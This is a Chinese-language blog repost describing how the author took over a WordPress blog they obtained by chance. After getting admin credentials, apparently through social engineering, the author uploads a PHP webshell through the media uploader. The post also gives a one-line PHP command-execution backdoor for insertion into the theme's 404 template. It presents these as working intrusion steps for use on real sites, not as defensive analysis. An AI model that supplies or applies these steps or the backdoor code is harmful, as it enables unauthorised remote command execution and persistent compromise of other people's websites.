本文共 1230 字,大约阅读时间需要 4 分钟。
WordPress是世界上用的最多的一款blog,可以说是世界流行,在前段时间爆出有一个任意文件漏洞,但由于时间很忙就没有进行测试,最近偶然拿到一个wordpress的blog,实际测试效果不错,下面将整个过程写出来跟朋友分享。 关于如何获取管理员用户和密码不在本文的主要讨论范围,笔者有两点经验,一个是社工;另外一个就是已有信息的利用;在获取Webshell的情况下,对现有信息的分析和利用,有可能获取WordPress后台管理密码。WordPress后台位置一般为:,显示页面如图1所示,输入正确的用户名和密码后顺利登录,如图2所示。 在 WordPress 管理页面的左边单击“媒体” - “新增媒体案”,接着就会出来一个上传的界面,在该界面中选择“ Browser 上傳功能”,如图 3 所示,直接选择 php 的 Webshell 上传即可。 上传 Webshell 后,有些系统装有杀毒软件会查杀部分 Webshell ,因此需要通过浏览记录来验证文件是否上传,系统在上传 WebShell 后会自动刷新,如果上传没有出现问题,则会如图 4 所示,上传文件显示在媒体库中。 将鼠标移动到上传的 Webshell 记录上,可以看到有三个按钮“編輯”、“刪除”和“查看”,单击查看即可访问 Webshell 的具体页面,如图 5 所示,选择记录中的链接,该链接地址即为真正的 Webshell 地址。 直接打开 Webshell 的地址,输入密码验证成功后,进入熟悉的 Webshell 界面,如图 6 所示,至此拿到了 WordPress 的 Webshell 。 通过询问群里好友,感谢 cnbird 提供的一个方法,不过我测试后未能获取 Webshell ,不知是咋个回事,现将利用方法奉上: ( 2 )单击“外观” - “编辑” - “ 404 模板”插入一句话木马程序代码 :<?php@system($_REQUEST[c]);?> ,如图 7 所示,插入后进行更新。 ( 3 )使用连接地址 wordpress/wp-content/themes/default/404.php 进行连接。结果没有反应,很是郁闷! 本文转自 simeon2005 51CTO博客,原文链接:http://blog.51cto.com/simeon/277369 转载地址:http://gjoso.baihongyu.com/